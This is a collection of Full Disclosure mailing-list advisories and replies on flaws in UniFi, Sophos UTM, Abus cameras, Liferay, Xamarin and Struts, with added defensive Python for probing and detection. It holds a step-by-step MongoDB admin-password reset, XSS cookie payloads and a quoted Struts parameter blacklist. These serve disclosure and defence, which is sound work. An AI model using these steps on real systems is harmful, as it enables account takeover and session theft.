Whether other products are affected we don't know; this was not mentioned in the disclosure (the PoC is only for the OS X software combined with an AP AC Lite), so we can't give a statement on other products of the vendor.

If nobody is able to get the PoC working, like I said above, maybe we made a mistake. I will not distance myself from making a mistake; I think the vuln should not be seen as too critical. But what you all approved is that if the database runs locally the following scenario should be bullet proof: all devices managed by the management software could be compromised if the PC gets infected, because the database has absolutely no authentication and you are able to reset the local admin's web interface password.

This would reduce the CVSSv3 to 6.3 and change the vuln type to "privilege escalation", combined with broken authentication, even without a "scope change":

CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H

Do you agree?

I'm looking forward to minimizing our "race time condition denial of service", to deliver fast results in future :-P

Best regards / Mit freundlichen Grüßen

Tim Schughart
CEO / Geschäftsführer

--
ProSec Networks e.K.
Ellingshohl 82
56076 Koblenz

Website: https://www.prosec-networks.com
E-Mail: t.schugh...@prosec.networks.com
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90
VAT ID: DE290654714, legal domicile Koblenz, HRA 21621
Re: [FD] Critical Vulnerability in Ubiquiti UniFi
Hi Carlos, you are correct that mongo is bound to 127.0.0.1 only. But you are able to get it remote if you are using the Unify Controller Software. So the db gets tunneled to your device. Test environment: 1. I have configured the AP to our network. 2. I have removed every piece of software for configuring the ap. 3. I have installed the Unify Manager (for Mac 5.2.7.) 4. I’m able to connect to the database via 127.0.0.1 Network topology: The access point is cabled to a AVM FritzBox. Our test client is connected via W-Lan provided by FritzBox - so there is no direct connection to the ap. Best regards Tim Schughart > Am 01.10.2016 um 15:30 schrieb Carlos Silva <r3...@r3pek.org>: > > Hi Tim! > > I can be missing something here but I just checked this on a fresh installed > Unifi Controller and mongod is binding to localhost making this a non-issue. > Or, you have to get a remote shell first before you can get a connection to > the DB. Am I missing something? > > Thanks, > Carlos Silva > > On Fri, Sep 30, 2016 at 10:49 AM, Tim Schughart > <t.schugh...@prosec-networks.com> wrote: > Hello @all, > > together with my colleague we found two uncritical vulnerabilities you'll > find below. > > Product: UniFi AP AC Lite > Vendor: Ubiquiti Networks Inc. > > Internal reference: ? (Bug ID) > Vulnerability type: Incorrect access control > Vulnerable version: Unify 5.2.7 and possible other versions affected (not > tested) > Vulnerable component: Database > Report confidence: yes > Solution status: Not fixed by Vendor, the bug is a feature. > Fixed versions: - > Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec > Networks > Solution date: - > Public disclosure: 2016-09-30 > CVE reference: CVE-2016-7792 > CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H > > > Vulnerability Details: > You are able to connect to the access points database, because of an broken > authentication (OWASP TOP10). So you are able to modify the database and read > the data. 
An possible scenario you'll find in PoC section. > > Risk: > An attacker gets access to the database and for e.g. is able to change the > admins password, like you see in PoC below. > > PoC: > 1. Generate SHA512 Hash with e.g. > mkpasswd -m sha-512 > > 2. Connect via network to database, e.g. : > mongo --port 27117 --host target_ip > > 3. Change password via command > "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow": > > "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})" > 4. Login via web interface with new password > > > Best regards / Mit freundlichen Grüßen > > > Tim Schughart > CEO / Geschäftsführer > > -- > ProSec Networks e.K. > Ellingshohl 82 > 56077 Koblenz > > Website: https://www.prosec-networks.com > E-Mail: t.schugh...@prosec.networks.com > Mobile: +49 (0)157 7901 5826 > Phone: +49 (0)261 450 930 90 > > "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or > LEGALLY PROTECTED information and is intended only for the named > recipient(s). Any unauthorized use, dissemination, copying or forwarding is > strictly prohibited. If you are not the intended recipient and have received > this email communication in error, please notify the sender immediately, > delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal > domicile Koblenz, HRA 21625.“ > > "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE > und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich > für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, > Weitergabe, Vervielfältigung oder Versendung ist strengstens verboten. > Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung > irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen > diese E-Mail und vernichten alle Kopien. USt-IdNr.: DE290654714, Amtsgericht > Koblenz, HRA 21625." 
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Critical Vulnerability in Ubiquiti UniFi
Hello @all,

together with my colleague we found two uncritical vulnerabilities you'll find below.

Product: UniFi AP AC Lite
Vendor: Ubiquiti Networks Inc.
Internal reference: ? (Bug ID)
Vulnerability type: Incorrect access control
Vulnerable version: UniFi 5.2.7 and possibly other versions affected (not tested)
Vulnerable component: Database
Report confidence: yes
Solution status: Not fixed by vendor, the bug is a feature.
Fixed versions: -
Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec Networks
Solution date: -
Public disclosure: 2016-09-30
CVE reference: CVE-2016-7792
CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Vulnerability Details:
You are able to connect to the access point's database because of broken authentication (OWASP Top 10). So you are able to modify the database and read the data. A possible scenario you'll find in the PoC section.

Risk:
An attacker gets access to the database and, for example, is able to change the admin's password, as you see in the PoC below.

PoC:
1. Generate a SHA-512 hash, e.g.:
   mkpasswd -m sha-512

2. Connect via network to the database, e.g.:
   mongo --port 27117 --host target_ip

3. Change the password via the command:
   db.admin.update({"name":"ProSec"}, {$set : {"x_shadow": "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})

4. Login via web interface with the new password

Best regards

Tim Schughart
CEO / Managing Director
ProSec Networks e.K.
https://www.prosec-networks.com
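The PoC above drives the mongo shell by hand, and the reply in this thread adds the caveat that mongod may be bound to 127.0.0.1 on the controller and still be reachable through the controller software's tunnel. The following is an added example (not ProSec's or Ubiquiti's code) that speaks enough of the legacy MongoDB wire protocol to answer the one question that matters for triage: does whatever listens on 27117, locally or through that tunnel, enforce authentication? It sends `listDatabases` to `admin.$cmd`, which MongoDB rejects with error code 13 when auth is enabled; `isMaster` would not distinguish the two cases. Assumptions: the port is the 27117 from the PoC, the server still answers OP_QUERY/OP_REPLY (removed in MongoDB 5.1, fine for the 2016-era controller), and the replies in the offline checks are constructed, not captured.

```python
"""Unauthenticated probe of a MongoDB listener over the legacy OP_QUERY wire protocol.

Added example, not ProSec's or Ubiquiti's code. Assumed: the target is the UniFi
controller's bundled mongod on TCP 27117 (the port from the PoC) and it still
answers OP_QUERY/OP_REPLY (removed in MongoDB 5.1; fine for a 2016-era
controller). listDatabases fails with error code 13 when auth is enabled, so
the verdict separates an open instance from one that merely answers isMaster.
"""
import socket
import struct

UNIFI_MONGO_PORT = 27117
OP_REPLY, OP_QUERY = 1, 2004
_FIXED = {0x01: ("<d", 8), 0x08: ("<?", 1), 0x10: ("<i", 4), 0x12: ("<q", 8)}  # double, bool, int32, int64


def bson_flat(fields: dict) -> bytes:
    """Encode a flat document of bool/int/float/str values, enough for a command document."""
    body = b""
    for name, val in fields.items():
        key = name.encode() + b"\x00"
        if isinstance(val, bool):
            body += b"\x08" + key + struct.pack("<?", val)
        elif isinstance(val, int):
            body += b"\x12" + key + struct.pack("<q", val)      # int64 for every int keeps it simple
        elif isinstance(val, float):
            body += b"\x01" + key + struct.pack("<d", val)
        elif isinstance(val, str):
            s = val.encode() + b"\x00"
            body += b"\x02" + key + struct.pack("<i", len(s)) + s
        else:
            raise TypeError(f"unsupported value for {name!r}")
    return struct.pack("<i", 4 + len(body) + 1) + body + b"\x00"


def parse_bson_flat(buf: bytes) -> dict:
    """Decode the top level of a BSON document; embedded documents/arrays are kept as raw bytes."""
    out, off = {}, 4
    end = struct.unpack_from("<i", buf, 0)[0] - 1            # index of the trailing 0x00
    while off < end:
        etype, name_end = buf[off], buf.index(b"\x00", off + 1)
        name, off = buf[off + 1:name_end].decode(), name_end + 1
        if etype in _FIXED:
            fmt, size = _FIXED[etype]
            out[name], off = struct.unpack_from(fmt, buf, off)[0], off + size
        elif etype == 0x02:                                  # string: int32 len (incl. NUL) + bytes
            slen = struct.unpack_from("<i", buf, off)[0]
            out[name], off = buf[off + 4:off + 3 + slen].decode(), off + 4 + slen
        elif etype in (0x03, 0x04):                          # embedded document / array
            dlen = struct.unpack_from("<i", buf, off)[0]
            out[name], off = buf[off:off + dlen], off + dlen
        else:
            raise ValueError(f"unsupported BSON type 0x{etype:02x} in field {name!r}")
    return out


def op_query(collection: str, query: bytes, request_id: int = 1) -> bytes:
    """OP_QUERY: flags, fullCollectionName, numberToSkip, numberToReturn (-1 = one doc), query doc."""
    body = struct.pack("<i", 0) + collection.encode() + b"\x00" + struct.pack("<ii", 0, -1) + query
    return struct.pack("<iiii", 16 + len(body), request_id, 0, OP_QUERY) + body


def op_reply(docs: list, response_to: int = 1) -> bytes:
    """Server-side OP_REPLY encoder, used here only to construct replies for offline checks."""
    body = struct.pack("<iqii", 0, 0, 0, len(docs)) + b"".join(docs)
    return struct.pack("<iiii", 16 + len(body), 99, response_to, OP_REPLY) + body


def parse_op_reply(data: bytes) -> dict:
    length, _, _, opcode = struct.unpack_from("<iiii", data, 0)
    if opcode != OP_REPLY or length > len(data):
        raise ValueError("not a complete OP_REPLY")
    count = struct.unpack_from("<iqii", data, 16)[3]
    off, docs = 36, []
    for _ in range(count):
        dlen = struct.unpack_from("<i", data, off)[0]
        docs.append(parse_bson_flat(data[off:off + dlen]))
        off += dlen
    return docs[0] if docs else {}


def classify_reply(reply: dict) -> str:
    if reply.get("ok") == 1.0:
        return "open"            # listDatabases answered: nobody asked us to authenticate
    if reply.get("code") == 13:
        return "auth-required"   # MongoDB error code 13 = Unauthorized
    return "unknown"


def probe(host: str, port: int = UNIFI_MONGO_PORT, timeout: float = 3.0) -> str:
    """Connect, ask admin.$cmd for listDatabases and classify the answer."""
    with socket.create_connection((host, port), timeout=timeout) as s, s.makefile("rb") as f:
        s.sendall(op_query("admin.$cmd", bson_flat({"listDatabases": 1})))
        head = f.read(4)                                     # messageLength first, then the rest
        data = head + f.read(struct.unpack("<i", head)[0] - 4)
    return classify_reply(parse_op_reply(data))
```

Run `probe("127.0.0.1")` on the controller host, or against the tunnelled endpoint the reply describes; "open" is the state the PoC depends on, and a controller that answers "auth-required" is not exploitable in the way shown. Nested values (the `databases` array in a real answer) are left as raw bytes on purpose, since only `ok` and `code` feed the verdict.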
[FD] Multiple exposures in Sophos UTM
Hello @all,

together with my colleague we found two uncritical vulnerabilities you'll find below.

Product: Sophos UTM
Vendor: Sophos Ltd.
Internal reference: ? (Bug ID)
Vulnerability type: Information Disclosure
Vulnerable version: 9.405-5, 9.404-5 and possibly other versions affected (not tested)
Vulnerable component: Frontend
Report confidence: yes
Solution status: Not fixed by vendor, no further responses from vendor.
Fixed versions: -
Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks
Vendor notification: 2016-09-01
Solution date: -
Public disclosure: 2016-09-30
CVE reference: CVE-2016-7397
CVSSv3: 6.7 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N

Report timeline:
2016-09-01: Contacted vendor, vendor acknowledged, no further response
2016-09-12: Contacted vendor again, started to fix
2016-09-30: Contacted vendor again, because there has been no response to our request and to our initially communicated disclosure date; no response again.
2016-09-30: Public disclosure.

Vulnerability Details:
The password is reflected into the DOM and is readable through the "value" field of the SMTP user settings in the Notifications tab. You have to be authenticated to access the configuration tab.

Risk:
An attacker gets access to the configured mailbox. Because Sophos UTM is a multi-user system, this is a problem in bigger company environments with split admin rights. The scope is changed, because in bigger environments you are getting access to the configured mailbox, which results in an integrity loss.

Steps to reproduce:
See vulnerability details.

--

Product: Sophos UTM
Vendor: Sophos Ltd.
Internal reference: ? (Bug ID)
Vulnerability type: Information Disclosure
Vulnerable version: 9.405-5, 9.404-5 and possibly other versions affected (not tested)
Vulnerable component: Frontend
Report confidence: ?
Solution status: Not fixed by vendor
Fixed versions: -
Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks
Vendor notification: 2016-09-01
Solution date: -
Public disclosure: 2016-10-01
CVE reference: CVE-2016-7442
CVSSv3: 6.7 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N

Vulnerability Details:
The password is reflected into the DOM and is readable through the "value" field of the proxy user settings in System Settings / Scan Settings / Anti-Spam. You have to be authenticated to access the configuration tab.

Risk:
An attacker gets access to the configured proxy user. Because Sophos UTM is a multi-user system, this is a problem in bigger company environments with split admin rights. The scope is changed, because in bigger environments you are getting access to the configured proxy user, which results in a privilege escalation.

Steps to reproduce:
See vulnerability details.

Best regards

Tim Schughart
CEO / Managing Director
ProSec Networks e.K.
https://www.prosec-networks.com
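Both findings above are the same defect twice: a stored credential is written back into the `value` attribute of a form field, so any authenticated admin (or anyone with their session) can read it from the page source. The scanner below is an added example, not Sophos code, that automates that check over saved admin pages: it flags every `<input>` that is either `type="password"` or named like a secret and arrives with a non-empty `value`. The two HTML snippets are constructed to mirror the SMTP and proxy-user forms; the field names are assumptions, not the UTM's real ones. The "fixed" page shows the pattern vendors use instead: ship the field empty and treat a blank submission as "keep the stored value".

```python
"""Find password fields whose value the server pre-filled into the HTML.

Added example, not Sophos code. The two HTML snippets are constructed to mirror
the two findings (SMTP user in notifications, proxy user in anti-spam settings);
the field names are assumptions. Run the scanner over saved admin pages from an
authenticated session to catch this class of disclosure regardless of vendor.
"""
from html.parser import HTMLParser

SECRET_NAME_HINTS = ("pass", "pwd", "secret", "token")


class PrefilledSecretFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        name = (a.get("name") or a.get("id") or "").lower()
        value = a.get("value", "")
        # type="password" is the obvious case; hidden/text fields named like a secret are the sneaky one
        looks_secret = a.get("type", "").lower() == "password" or any(h in name for h in SECRET_NAME_HINTS)
        if looks_secret and value:
            self.findings.append({"field": name, "type": a.get("type", ""), "masked": mask(value)})


def mask(value: str) -> str:
    """Keep the first two characters so a finding is recognisable without logging the secret."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "*" * len(value)


def find_prefilled_secrets(page: str) -> list:
    finder = PrefilledSecretFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


# Constructed: how the vulnerable notification / anti-spam forms might look.
VULNERABLE_PAGE = """
<form action="/notifications">
  <input type="text" name="smtp_user" value="alerts@example.invalid">
  <input type="password" name="smtp_password" value="Sup3rS3cretPW">
</form>
<form action="/antispam">
  <input type="hidden" name="proxy_pwd" value="pr0xyPass">
</form>
"""

# Constructed: the same forms with the secret left out; the server keeps the stored value when the field is blank.
FIXED_PAGE = """
<form action="/notifications">
  <input type="text" name="smtp_user" value="alerts@example.invalid">
  <input type="password" name="smtp_password" value="" placeholder="unchanged">
</form>
<form action="/antispam">
  <input type="password" name="proxy_pwd" autocomplete="new-password">
</form>
"""
```

Feed it the raw HTTP response body, not a browser-rendered DOM: values that JavaScript fills in afterwards are a different problem, and values the server already put into the markup are exactly what the advisory reports.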
[FD] Persistent XSS in Abus Security Center - CVSS 8.0
Hi @all,

Product: Abus Security Cams
Vendor: Abus Group
Internal reference: -
Vulnerability type: Cross Site Scripting
Vulnerable version: 0101a and possibly other versions affected (not tested)
Vulnerable component: FTP
Report confidence: Confirmed
Solution status: Not fixed by vendor, will not patch the vuln.
Fixed versions: -
Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks
Vendor notification: 2016-09-21
Solution date:
Public disclosure: 2016-09-29
CVE reference:
CVSSv3: 8.0 AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
<https://nvd.nist.gov/cvss/v3-calculator?vector=AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H>

Vulnerability Details:
The username entered via FTP login is reflected into the log, which is rendered in the web interface without input validation. This results in a successful, persistent XSS.

Risk:
Through this you are able to get, e.g., the session cookies of the cam's administrator. So you are able to get full access, persistently.

PoC:
FTP Username: alert(document.cookie)
FTP Pass: any
Browse to the log and watch the popup :)

Best regards

Tim Schughart
CEO / Managing Director
ProSec Networks e.K.
https://www.prosec-networks.com
[FD] Security vulnerability - Liferay Portal Enterprise Edition
Hey guys,

during a penetration test I have found an unknown persistent XSS in the Liferay Portal backend.

#General Information#

Manufacturer description: Liferay Portal is an enterprise web platform for the development of business solutions, which provides quick results and long-term value.

#Details#
- Product: Liferay Portal Enterprise Edition (6.2 EE SP13)
- Affected versions: All <= 6.2 EE SP13
- Type of attack: Persistent Cross Site Scripting
- Proof of Concept: Yes, 6.2 EE SP13
- Authentication required: Yes
- Reason: Missing input validation
- Impact: Injection of malicious JavaScript code

#PoC#

You have to be authenticated in the administrator backend. There you have to browse to the control center:
- In Configuration click on Portal Settings
- Select Authentication
- Select LDAP
- Select Add Server
- Input the following code in the server name field

Value for the LDAP server name field: Name_of_ldap_serveralert("XSS")

The script is inserted into the configuration page persistently until the LDAP server is deleted from the database again.

Best regards

Tim Schughart
CEO | IT Security specialist
ProSec Networks
http://www.prosec-networks.com
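The Abus camera log and the Liferay LDAP server name above are the same bug in two places: attacker-controlled text is stored, then rendered into HTML unchanged. Both advisories name "missing input validation" as the reason, but the fix that actually closes the hole is encoding at the point of output: a username or a server name may legitimately contain `<`, `>` or `"`, so rejecting them on the way in is neither sufficient nor always acceptable. The block below is an added example, not Abus or Liferay code, with constructed log lines: it shows the vulnerable rendering beside the encoded one for both the element context (a log table cell) and the attribute context (the server-name `value=`), plus a small detector for hunting markup that is already sitting in stored logs.

```python
"""Stored XSS through log entries and config names: vulnerable vs. output-encoded rendering.

Added example, not code from Abus or Liferay. The log lines are constructed.
Output encoding with html.escape is the fix demonstrated; the advisories'
"input validation" framing is deliberately not what this relies on.
"""
import html
import re

# Constructed sample of what a camera's log view might hold after a few FTP login attempts.
CONSTRUCTED_LOG = [
    ("2016-09-21 10:14:02", "ftp", 'login ok for user "operator" connection=closed'),
    ("2016-09-21 10:14:31", "ftp", 'login failed for user "<script>alert(document.cookie)</script>"'),
    ("2016-09-21 10:15:07", "ftp", 'login failed for user "x" onmouseover="alert(1)"'),
]

# Tag openers, event-handler attributes and javascript: URLs; \b keeps "connection=" from matching.
_MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript:", re.I)


def render_row_vulnerable(ts, source, message):
    # Raw concatenation: whatever the FTP client sent becomes part of the page.
    return f"<tr><td>{ts}</td><td>{source}</td><td>{message}</td></tr>"


def render_row_safe(ts, source, message):
    # html.escape turns < > & " ' into entities, so the browser renders text, not tags.
    cells = "".join(f"<td>{html.escape(str(c), quote=True)}</td>" for c in (ts, source, message))
    return f"<tr>{cells}</tr>"


def render_ldap_server_field(name):
    # Attribute context (the Liferay server-name field): quote=True is mandatory here,
    # otherwise a " in the name closes the attribute and the rest becomes new attributes.
    return f'<input name="ldapServerName" value="{html.escape(name, quote=True)}">'


def suspicious_entries(log):
    """Detection side: flag stored log messages that carry markup, for hunting in existing logs."""
    return [entry for entry in log if _MARKUP.search(entry[2])]
```

The detector is for triage of logs you already have, not a replacement for encoding: it will miss encodings the regex does not know, which is exactly why the rendering side must not depend on it.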
Re: [FD] Xamarin for Android 5.1 DLL Hijack Vulnerability
Isn't this the public bug tracker?
https://bugzilla.xamarin.com/describecomponents.cgi?product=Android

Though, correct that case id doesn't map to anything there.

-Tim Strazzere

On Tue, May 19, 2015 at 2:32 PM, ValdikSS <i...@valdikss.org.ru> wrote:
> They don't have a public bugtracker. Case ID is 140518.
>
> On 05/20/2015 12:29 AM, Tim wrote:
> > Thanks for posting this to FD, they didn't even include it in their release notes;
> > http://developer.xamarin.com/releases/android/xamarin.android_5/xamarin.android_5.1/
> >
> > Was there a bug reported in bugzilla to link back to?
> >
> > -Tim Strazzere
> >
> > On Tue, May 19, 2015 at 6:49 AM, ValdikSS <i...@valdikss.org.ru> wrote:
> > > Xamarin for Android prior to version 5.1 allows replacing internal DLL files inside the APK with files on the SD card which are not in secure storage. A malicious application without any special permissions could drop backdoored DLL files into /storage/sdcard0/Android/data/app_id/files/.__override__/ and the victim application would use the files from the SD card. Not just the main application library could be hijacked, but also Xamarin's System.dll and Mono.Android.dll, which are shipped in all Xamarin for Android applications.
> > >
> > > Developers should rebuild their applications using Xamarin for Android 5.1 or newer in release mode.
> > >
> > > This vulnerability was found by accident, which allowed me to eat for free for a month.
> > >
> > > Timeline:
> > > 03.04.2015 Vulnerability is found
> > > 07.04.2015 Message sent to Xamarin
> > > 08.04.2015 Xamarin acknowledged the vulnerability
> > > 29.04.2015 Fixed stable version released
Re: [FD] Xamarin for Android 5.1 DLL Hijack Vulnerability
Thanks for posting this to FD, they didn't even include it in their release notes;
http://developer.xamarin.com/releases/android/xamarin.android_5/xamarin.android_5.1/

Was there a bug reported in bugzilla to link back to?

-Tim Strazzere

On Tue, May 19, 2015 at 6:49 AM, ValdikSS <i...@valdikss.org.ru> wrote:
> Xamarin for Android prior to version 5.1 allows replacing internal DLL files inside the APK with files on the SD card which are not in secure storage. A malicious application without any special permissions could drop backdoored DLL files into /storage/sdcard0/Android/data/app_id/files/.__override__/ and the victim application would use the files from the SD card. Not just the main application library could be hijacked, but also Xamarin's System.dll and Mono.Android.dll, which are shipped in all Xamarin for Android applications.
>
> Developers should rebuild their applications using Xamarin for Android 5.1 or newer in release mode.
>
> This vulnerability was found by accident, which allowed me to eat for free for a month.
>
> Timeline:
> 03.04.2015 Vulnerability is found
> 07.04.2015 Message sent to Xamarin
> 08.04.2015 Xamarin acknowledged the vulnerability
> 29.04.2015 Fixed stable version released
Re: [FD] [ANN] Struts 2 up to 2.3.16.1: Zero-Day Exploit Mitigation (security | critical)
Also, I'm a tad confused by the regex you have as a stop-gap. For the readers' convenience:

(.*\.|^|.*|\[('|))(c|C)lass(\.|('|)]|\[).*,^dojo\..*,^struts\..*,^session\..*,^request\..*,^application\..*,^servlet(Request|Response)\..*,^parameters\..*,^action:.*,^method:.*

If your regex evaluation is case-sensitive, then clearly you need to check for "class" and "Class", since OGNL converts foo to getFoo, and would likely also convert Foo to getFoo. But if the blacklist is case-sensitive, then don't you also need to check for ^Request..., ^Session..., ^Struts..., and so on? Or is it actually case-insensitive and you're just being unnecessarily careful with class?

Also: Thought about unicode lately?

tim

PS- yes, I'm too lazy to actually look at the Struts code right now.

On Fri, Apr 25, 2014 at 09:52:23AM -0700, Tim wrote:
> So I have to say, I feel like the Struts team is kind of... failing. Here are my gripes:
>
> A) I questioned the last bug fix in the thread here [1], where we were all reassured that it was just ClassLoader manipulation, not RCE. Clearly that's not true.
>
> B) The fix for the last CVE was that crappy ^class\. filter, which I pointed out was insufficient. The Struts team quickly fixed that, but never bothered to update the workaround section in the last advisory to the less-terrible .*\.class\..* regex (or whatever it was). So if developers just implemented the workaround from the advisory, they were obviously not protected. (In hindsight, they never were protected even with the better regex, but it was just irresponsible not to make the second regex more public.)
>
> C) The Struts team is playing whack-a-mole. Instead of fixing the root issue, they are just adding one blacklist regex after another, hoping no one figures out yet another way around it. I urge you to take OGNL and *throw it out*. Replace it with something that allows only a white list of properties to be set, based on what the application defines as relevant.
>
> Until then, I'm recommending to my clients that they avoid Struts like the plague.
>
> tim
>
> 1. http://seclists.org/fulldisclosure/2014/Mar/53
>
> On Thu, Apr 24, 2014 at 05:37:13PM +0200, Rene Gielen wrote:
> > In Struts 2.3.16.1, an issue with ClassLoader manipulation via request parameters was supposed to be resolved. Unfortunately, the correction wasn't sufficient.
> >
> > A security fix release fully addressing this issue is in preparation and will be released as soon as possible. Once the release is available, all Struts 2 users are strongly recommended to update their installations.
> >
> > * Until the release is available, all Struts 2 users are strongly recommended to apply the mitigation described in [1]
> > * Please follow the Apache Struts announcement channels [2][3][4][5] to stay updated regarding the upcoming security release.
> >
> > Most likely the release will be available within the next 72 hours. Please prepare for upgrading all Struts 2 based production systems to the new release version once available.
> >
> > - The Apache Struts Team.
> >
> > [1] http://struts.apache.org/announce.html#a20140424
> > [2] http://struts.apache.org/mail.html
> > [3] http://struts.apache.org/announce.html
> > [4] https://plus.google.com/+ApacheStruts/posts
> > [5] https://twitter.com/TheApacheStruts
> >
> > --
> > René Gielen
> > http://twitter.com/rgielen
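The case-sensitivity question in the reply above can be settled per parameter name by running the quoted `excludeParams` list through a regex engine twice, once case-sensitive and once not. The block below is an added example, not code from the Struts project or from either mail: it models how the interceptor consumes the list (split on commas, full match per pattern, the way `Matcher.matches()` behaves) and evaluates constructed parameter names in both modes. Two assumptions: the character the list archive dropped from `\[('|))` in the quoted regex was a double quote, and the modelled matching semantics are taken from how the list is described here, not verified against the Struts source.

```python
"""Exercise the Struts 2.3.16.1 excludeParams blacklist against sample parameter names.

Added example, not from the Struts project or from the thread. The pattern list
is the one quoted in the reply; the dropped character inside \[('|")) is
restored as a double quote (assumption). Whether Struts compiles these with
CASE_INSENSITIVE is exactly the open question, so both modes run side by side.
"""
import re

# Comma-separated list in the form Struts' ParametersInterceptor consumes it (no pattern contains a comma).
EXCLUDE_PARAMS = (
    r"""(.*\.|^|.*|\[('|"))(c|C)lass(\.|('|")]|\[).*,"""
    r"^dojo\..*,^struts\..*,^session\..*,^request\..*,^application\..*,"
    r"^servlet(Request|Response)\..*,^parameters\..*,^action:.*,^method:.*"
)

# Constructed parameter names: the known ClassLoader vector in three spellings, two request.* spellings, one benign.
SAMPLE_NAMES = [
    "class.classLoader.resources.dirContext.docBase",
    "Class.classLoader.resources.dirContext.docBase",
    "CLASS.classLoader.resources.dirContext.docBase",
    "foo['class'].classLoader.resources.dirContext.docBase",
    "request.foo",
    "Request.foo",
    "user.name",
]


def compile_excludes(spec: str, case_insensitive: bool) -> list:
    """Split on commas and compile each entry; IGNORECASE mirrors Java's CASE_INSENSITIVE."""
    flags = re.IGNORECASE if case_insensitive else 0
    return [re.compile(p, flags) for p in spec.split(",") if p]


def is_excluded(name: str, case_insensitive: bool) -> bool:
    """Java's Matcher.matches() is a whole-string match, so fullmatch() is the faithful translation."""
    return any(r.fullmatch(name) for r in compile_excludes(EXCLUDE_PARAMS, case_insensitive))


def coverage_report(names, case_insensitive: bool) -> dict:
    """Map each name to whether the blacklist would block it under the given matching mode."""
    return {n: is_excluded(n, case_insensitive) for n in names}


def gaps(names) -> list:
    """Names the list blocks only when matching is case-insensitive: the reply's ^Request..., ^Session... point."""
    return [n for n in names if is_excluded(n, True) and not is_excluded(n, False)]
```

`gaps(SAMPLE_NAMES)` is the list a developer should look at: every name in it is unprotected if the engine compiles the patterns case-sensitively, and the `(c|C)lass` spelling protects only two of the three `class` variants in that mode. The block says nothing about whether OGNL would actually resolve `Request.foo` or `CLASS.x` to a getter, which is the other half of the question and needs the OGNL source rather than a regex.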
Re: [FD] Audit: don't only focus on heartbleed issue
> and the others need a MITM attack which is not *that* easy as connecting to a server and sending a heartbleed packet without anything in the logs of the attacked server

I agree with you here. It seems that Lucky13 requires much more access and is much harder to pull off in practice. Unless there are new techniques out there that I haven't kept up on...

> frankly outside a public hotspot / untrusted network nobody but the NSA and other agencies are really able to MITM

This I think is a misconception, or at least overstated. Anyone on the same network as you can MitM you. Anyone on the same network as the remote end point can MitM you. For some reason in this day and age people have all forgotten about ARP poisoning, NetBIOS name poisoning, DHCP hijacking, and a whole host of other ways to redirect traffic. And apparently random people halfway around the world can hijack your DNS resolver [1].

The dividing line between internal network and the Internet is becoming fuzzier every day. It is getting easier to get inside and yet everyone still seems to run an unsegmented internal trusted network.

tim

1. http://arstechnica.com/information-technology/2014/03/google-dns-briefly-hijacked-to-venezuela/
Re: [FD] heartbleed OpenSSL bug CVE-2014-0160
Nope, works also on other protocols like IMAPS.

On 08.04.2014 15:30, Chris Schmidt wrote:
> The bug is in the TLS implementation in OpenSSL, you will only see it on https
>
> Sent from my iPhone
>
> On Apr 8, 2014, at 4:43 AM, Nik Mitev <n...@mitev.net> wrote:
> > I used the tool Kirils linked (http://possible.lv/tools/hb/) and my unpatched servers running a Tor node or an OpenVPN server returned the correct (old) version of openssl but "not vulnerable". Is it the bug or the tool that seems to be limited to https, I wonder? Patched now so I can't test with this tool...
> >
> > -----Original Message-----
> > From: Fraser Scott <fraser.sc...@gmail.com>
> > To: fulldisclosure@seclists.org
> > Subject: Re: [FD] heartbleed OpenSSL bug CVE-2014-0160
> > Date: Tue, 8 Apr 2014 10:24:02 +0100
> >
> > This seems to be the best test so far: http://s3.jspenguin.org/ssltest.py
> > Other tests false-positive on patched versions from what I can see.
> >
> > On 8 April 2014 01:10, Kirils Solovjovs <kirils.solovj...@kirils.com> wrote:
> > > We are doomed.
> > >
> > > Description: http://www.openssl.org/news/vulnerabilities.html
> > > Article dedicated to the bug: http://heartbleed.com/
> > > Tool to check if the TLS heartbeat extension is supported: http://possible.lv/tools/hb/
> > >
> > > A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64kB of memory to a connected client or server. 1.0.1[abcdef] affected.
> > >
> > > P.S. Happy Monday!